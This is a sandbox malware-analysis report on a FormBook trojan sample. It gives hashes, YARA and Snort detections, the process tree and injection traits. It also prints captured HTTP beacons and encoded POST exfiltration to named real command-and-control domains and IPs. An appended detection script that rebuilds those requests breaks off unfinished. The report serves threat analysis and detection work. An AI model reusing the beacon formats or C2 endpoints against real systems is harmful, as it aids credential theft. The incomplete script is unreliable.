Windows Analysis Report
qHpeBvr9cR.exe

Overview

General Information

Sample Name: qHpeBvr9cR.exe
Analysis ID: 756313
MD5: f5bea76ffac05afbe19274595801184e
SHA1: 93ef457bfcbc5f0860b1b7f6353ed6e9b0afd60e
SHA256: 40dcfb704112265b383679baa3064cd7355bd02119b117f396e1b0283342362c
Tags: 32, exe, Formbook, trojan

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Uses netsh to modify the Windows network and firewall settings
Machine Learning detection for sample
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • qHpeBvr9cR.exe (PID: 5588 cmdline: C:\Users\user\Desktop\qHpeBvr9cR.exe MD5: F5BEA76FFAC05AFBE19274595801184E)
    • febcldoukq.exe (PID: 5816 cmdline: "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef MD5: 96E050F99502FE7C52FD9B0F10202578)
      • febcldoukq.exe (PID: 5828 cmdline: "C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef MD5: 96E050F99502FE7C52FD9B0F10202578)
        • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • autochk.exe (PID: 3624 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
          • netsh.exe (PID: 5920 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
  • cleanup

Malware Configuration

FormBook: {"C2 list": ["www.brennancorps.info/henz/"]}
Source | Rule | Description | Author | Strings
00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x6611:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1f070:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa8bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x17df7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x17bf5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x176a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x17cf7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x17e6f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa48a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x168ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1dde7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1edda:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x1a0e9:$sqlite3step: 68 34 1C 7B E1
    • 0x1ac61:$sqlite3step: 68 34 1C 7B E1
    • 0x1a12b:$sqlite3text: 68 38 2A 90 C5
    • 0x1aca6:$sqlite3text: 68 38 2A 90 C5
    • 0x1a142:$sqlite3blob: 68 53 D8 7F 8C
    • 0x1acbc:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

      Source | Rule | Description | Author | Strings
      2.2.febcldoukq.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        2.2.febcldoukq.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
        • 0x7d48:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x207a7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbff6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1952e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        2.2.febcldoukq.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x1932c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18dd8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1942e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x195a6:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xbbc1:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x18023:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1f51e:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x20511:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.febcldoukq.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x1b820:$sqlite3step: 68 34 1C 7B E1
        • 0x1c398:$sqlite3step: 68 34 1C 7B E1
        • 0x1b862:$sqlite3text: 68 38 2A 90 C5
        • 0x1c3dd:$sqlite3text: 68 38 2A 90 C5
        • 0x1b879:$sqlite3blob: 68 53 D8 7F 8C
        • 0x1c3f3:$sqlite3blob: 68 53 D8 7F 8C
        2.2.febcldoukq.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          No Sigma rule has matched
          Timestamp: 11/30/22-01:10:42.253815
          Source IP: 192.168.2.5
          Destination IP: 206.233.197.135
          SID: 2031453
          Source Port: 49710
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          Timestamp: 11/30/22-01:10:50.366888
          Source IP: 192.168.2.5
          Destination IP: 162.214.129.149
          SID: 2031453
          Source Port: 49712
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          Timestamp: 11/30/22-01:10:42.253815
          Source IP: 192.168.2.5
          Destination IP: 206.233.197.135
          SID: 2031449
          Source Port: 49710
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          Timestamp: 11/30/22-01:10:50.366888
          Source IP: 192.168.2.5
          Destination IP: 162.214.129.149
          SID: 2031412
          Source Port: 49712
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          Timestamp: 11/30/22-01:10:42.253815
          Source IP: 192.168.2.5
          Destination IP: 206.233.197.135
          SID: 2031412
          Source Port: 49710
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          Timestamp: 11/30/22-01:10:50.366888
          Source IP: 192.168.2.5
          Destination IP: 162.214.129.149
          SID: 2031449
          Source Port: 49712
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          AV Detection

          Source: qHpeBvr9cR.exe | ReversingLabs: Detection: 41%
          Source: qHpeBvr9cR.exe | Virustotal: Detection: 36%
          Source: Yara match | File source: 2.2.febcldoukq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.febcldoukq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: http://www.eufidelizo.com/henz/?ChMxG4C=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&8p08qr=2d0X | Avira URL Cloud: Label: malware
          Source: http://www.patrickguarte.com/henz/?ChMxG4C=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYBdz817Owqh44+wA==&8p08qr=2d0X | Avira URL Cloud: Label: malware
          Source: www.brennancorps.info/henz/ | Avira URL Cloud: Label: malware
          Source: http://www.patrickguarte.com/henz/ | Avira URL Cloud: Label: malware
          Source: http://www.lyonfinancialusa.com/henz/ | Avira URL Cloud: Label: malware
          Source: http://www.afterdarksocial.club/henz/ | Avira URL Cloud: Label: malware
          Source: eufidelizo.com | Virustotal: Detection: 8%
          Source: www.eufidelizo.com | Virustotal: Detection: 6%
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | ReversingLabs: Detection: 20%
          Source: qHpeBvr9cR.exe | Joe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Joe Sandbox ML: detected
          Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.brennancorps.info/henz/"]}
          Source: qHpeBvr9cR.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Binary string: netsh.pdb source: febcldoukq.exe, 00000002.00000002.402996067.0000000002F70000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: febcldoukq.exe, 00000001.00000003.293154530.0000000003060000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000001.00000003.297615562.0000000003630000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000003.300663254.0000000000E5B000.00000004.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.400649105.000000000110F000.00000040.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.398907397.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.392692809.0000000000FD2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.400318872.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.564732958.000000000356F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.563098627.0000000003450000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: febcldoukq.exe, 00000002.00000002.402996067.0000000002F70000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: febcldoukq.exe, 00000001.00000003.293154530.0000000003060000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000001.00000003.297615562.0000000003630000.00000004.00001000.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000003.300663254.0000000000E5B000.00000004.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.400649105.000000000110F000.00000040.00000800.00020000.00000000.sdmp, febcldoukq.exe, 00000002.00000002.398907397.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.392692809.0000000000FD2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.400318872.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.564732958.000000000356F000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000005.00000002.563098627.0000000003450000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exe | Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exe | Code function: 0_2_00405FF6 FindFirstFileA,FindClose
          Source: C:\Users\user\Desktop\qHpeBvr9cR.exe | Code function: 0_2_00402654 FindFirstFileA
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 1_2_00B25293 FindFirstFileExW
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 1_2_00B25347 FindFirstFileExW,FindNextFileW,FindClose,FindClose
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_00B25293 FindFirstFileExW
          Source: C:\Users\user\AppData\Local\Temp\febcldoukq.exe | Code function: 2_2_00B25347 FindFirstFileExW,FindNextFileW,FindClose,FindClose

          Networking

          Source: C:\Windows\explorer.exe | Domain query: www.patrickguarte.com
          Source: C:\Windows\explorer.exe | Network Connect: 155.159.61.221 80
          Source: C:\Windows\explorer.exe | Domain query: www.eufidelizo.com
          Source: C:\Windows\explorer.exe | Domain query: www.lyonfinancialusa.com
          Source: C:\Windows\explorer.exe | Domain query: www.afterdarksocial.club
          Source: C:\Windows\explorer.exe | Network Connect: 192.185.217.47 80
          Source: C:\Windows\explorer.exe | Network Connect: 206.233.197.135 80
          Source: C:\Windows\explorer.exe | Network Connect: 162.214.129.149 80
          Source: C:\Windows\explorer.exe | Domain query: www.19t221013d.tokyo
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 206.233.197.135:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 206.233.197.135:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 206.233.197.135:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 162.214.129.149:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 162.214.129.149:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 162.214.129.149:80
          Source: Malware configuration extractor | URLs: www.brennancorps.info/henz/
          Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox View | ASN Name: COGENT-174US
          Source: global traffic | HTTP traffic detected:
            GET /henz/?ChMxG4C=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&8p08qr=2d0X HTTP/1.1
            Host: www.eufidelizo.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected:
            GET /henz/?ChMxG4C=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzZl0jGQ0nXo34yzw==&8p08qr=2d0X HTTP/1.1
            Host: www.lyonfinancialusa.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected:
            GET /henz/?ChMxG4C=8TptbrIX6F4NxrWdTDNRTBReo0fMEuELv5cUeaX5N5UPFd9Hxy/eTVHt8QapNK2qZdoBzpjQ3MhBnX7XpU/ZSQN3PeXGVgYZcA==&8p08qr=2d0X HTTP/1.1
            Host: www.afterdarksocial.club
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic | HTTP traffic detected:
            GET /henz/?ChMxG4C=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYBdz817Owqh44+wA==&8p08qr=2d0X HTTP/1.1
            Host: www.patrickguarte.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: Joe Sandbox View | IP Address: 192.185.217.47
          Source: global traffic | HTTP traffic detected:
            POST /henz/ HTTP/1.1
            Host: www.lyonfinancialusa.com
            Connection: close
            Content-Length: 189
            Cache-Control: no-cache
            Origin: http://www.lyonfinancialusa.com
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://www.lyonfinancialusa.com/henz/
            Accept-Language: en-US
            Accept-Encoding: gzip, deflate
            Data Ascii: ChMxG4C=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-EPdPw8deIPGkROeQLw).
          Source: global traffic | HTTP traffic detected:
            POST /henz/ HTTP/1.1
            Host: www.afterdarksocial.club
            Connection: close
            Content-Length: 189
            Cache-Control: no-cache
            Origin: http://www.afterdarksocial.club
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://www.afterdarksocial.club/henz/
            Accept-Language: en-US
            Accept-Encoding: gzip, deflate
            Data Ascii: ChMxG4C=xRBNYfoUyGsH5pWXPk4gUR0b1xGlCqcJnYoueLvDRrU3LtRxxBOKTX7VhDSlCpejV85HsZKP1e09iGn-o1LzZTNECvr2ZQcWfY546EwsOMATCsMtSBI7GOJQf20GEp70f91_umNyNu12twVd7ZBOOqb65yC_SL2jCxS3(dw-lKsshGSVcA).
          Source: global traffic | HTTP traffic detected:
            POST /henz/ HTTP/1.1
            Host: www.patrickguarte.com
            Connection: close
            Content-Length: 189
            Cache-Control: no-cache
            Origin: http://www.patrickguarte.com
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://www.patrickguarte.com/henz/
            Accept-Language: en-US
            Accept-Encoding: gzip, deflate
            Data Ascii: ChMxG4C=0rVusO(JndmB3yg331ld3GXW3dJNbaBQ7nDCFkm3CgHH7SM6rvuGgAZGh2WPbIX4VVrKOb4AQoAe18uCngUJWRJ4(uMuvLdHyVJ8PlKT0KlYpGF8l_0BEvN7xwzLl_OkrE2ifndEklURZW4tekN3gSmGac1CG63ip072G5LDWVUDNF~GIA).
          Source: global traffic | HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Date: Wed, 30 Nov 2022 00:10:29 GMT
            Server: Apache
            Upgrade: h2,h2c
            Connection: Upgrade, close
            Last-Modified: Thu, 29 Sep 2022 21:55:23 GMT
            Accept-Ranges: bytes
            Content-Length: 11816
            Vary: Accept-Encoding
            Content-Type: text/html
          Source: global traffic | HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Date: Wed, 30 Nov 2022 00:10:48 GMT
            Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
            Accept-Ranges: bytes
            Connection: close
            Transfer-Encoding: chunked
            Content-Type: text/html
          Source: global traffic | HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Date: Wed, 30 Nov 2022 00:10:50 GMT
            Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
            Accept-Ranges: bytes
            Connection: close
            Transfer-Encoding: chunked
            Content-Type: text/html
          Source: global traffic | HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Server: nginx
            Date: Wed, 30 Nov 2022 00:10:56 GMT
            Content-Type: text/html
            Content-Length: 146
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global traffic | HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Server: nginx
            Date: Wed, 30 Nov 2022 00:10:58 GMT
            Content-Type: text/html
            Content-Length: 146
            Connection: close
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: netsh.exe, 00000005.00000002.565764534.0000000003B56000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://code.jquery.com/jquery-3.3.1.min.js
          Source: netsh.exe, 00000005.00000002.565764534.0000000003B56000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
          Source: qHpeBvr9cR.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: qHpeBvr9cR.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000003.00000000.356156439.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.336262975.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.303735560.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: -ODfqI49.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: -ODfqI49.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: -ODfqI49.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: -ODfqI49.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: -ODfqI49.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: -ODfqI49.5.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: -ODfqI49.5.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: -ODfqI49.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: -ODfqI49.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: -ODfqI49.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: netsh.exe, 00000005.00000002.565816613.0000000003CE8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.lyonfinancialusa.com/henz/?ChMxG4C=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIsz
          Source: unknownHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.lyonfinancialusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lyonfinancialusa.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 68 4d 78 47 34 43 3d 46 5f 54 33 34 4d 43 59 37 4c 4c 6c 35 30 36 46 70 55 6d 45 4c 6d 56 30 6d 31 6d 41 7e 59 47 31 45 72 5a 72 7a 51 72 43 4f 57 4d 4c 57 30 50 39 66 6d 38 71 30 51 56 44 6d 5a 39 4b 58 4c 58 59 43 47 67 65 67 44 28 54 4b 77 71 30 79 6a 6f 58 48 68 65 62 75 32 37 65 5a 42 62 45 69 45 6b 62 33 42 53 6a 35 64 4f 6e 57 42 38 78 4b 44 71 48 63 52 32 4b 48 38 32 37 68 43 41 6c 51 79 65 4e 57 59 50 55 32 4c 59 59 6e 75 74 6f 58 35 49 43 7a 65 73 58 73 41 4b 7a 4d 4c 79 53 41 5f 6b 2d 45 50 64 50 77 38 64 65 49 50 47 6b 52 4f 65 51 4c 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ChMxG4C=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-EPdPw8deIPGkROeQLw).
          Source: unknownDNS traffic detected: queries for: www.eufidelizo.com
          Source: global trafficHTTP traffic detected: GET /henz/?ChMxG4C=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw==&8p08qr=2d0X HTTP/1.1Host: www.eufidelizo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?ChMxG4C=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzZl0jGQ0nXo34yzw==&8p08qr=2d0X HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?ChMxG4C=8TptbrIX6F4NxrWdTDNRTBReo0fMEuELv5cUeaX5N5UPFd9Hxy/eTVHt8QapNK2qZdoBzpjQ3MhBnX7XpU/ZSQN3PeXGVgYZcA==&8p08qr=2d0X HTTP/1.1Host: www.afterdarksocial.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?ChMxG4C=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYBdz817Owqh44+wA==&8p08qr=2d0X HTTP/1.1Host: www.patrickguarte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
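The four GET beacons and the POST above share one URI path and one parameter name across four different hosts, carry a NUL-only body on GET, and the POST forges Origin and Referer from its own target. The script below is an added example, not part of the Joe Sandbox report: it re-creates those five requests from the report's "HTTP traffic detected" entries (request line, Host/Connection and the POST's browser-like headers copied from the report, bodies taken from the Data Raw bytes) and runs a set of heuristics over them. The indicator names, the 64-character blob threshold and the three-host rotation threshold are my own assumptions, not a published FormBook signature.

```python
"""Heuristics for the FormBook-style HTTP beacons captured in this report."""
import re
from collections import defaultdict
from dataclasses import dataclass


def _get(host, blob):
    # Constructed from the report's GET entries: long blob + 4-char tag in the query,
    # only Host and Connection headers, seven NUL bytes as the body.
    return (f"GET /henz/?ChMxG4C={blob}&8p08qr=2d0X HTTP/1.1\r\n"
            f"Host: {host}\r\nConnection: close\r\n\r\n").encode() + b"\x00" * 7


REQUESTS = [
    _get("www.eufidelizo.com", "wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692MpWFmEiKCsF21Xzw=="),
    _get("www.lyonfinancialusa.com", "I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzZl0jGQ0nXo34yzw=="),
    _get("www.afterdarksocial.club", "8TptbrIX6F4NxrWdTDNRTBReo0fMEuELv5cUeaX5N5UPFd9Hxy/eTVHt8QapNK2qZdoBzpjQ3MhBnX7XpU/ZSQN3PeXGVgYZcA=="),
    _get("www.patrickguarte.com", "5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYBdz817Owqh44+wA=="),
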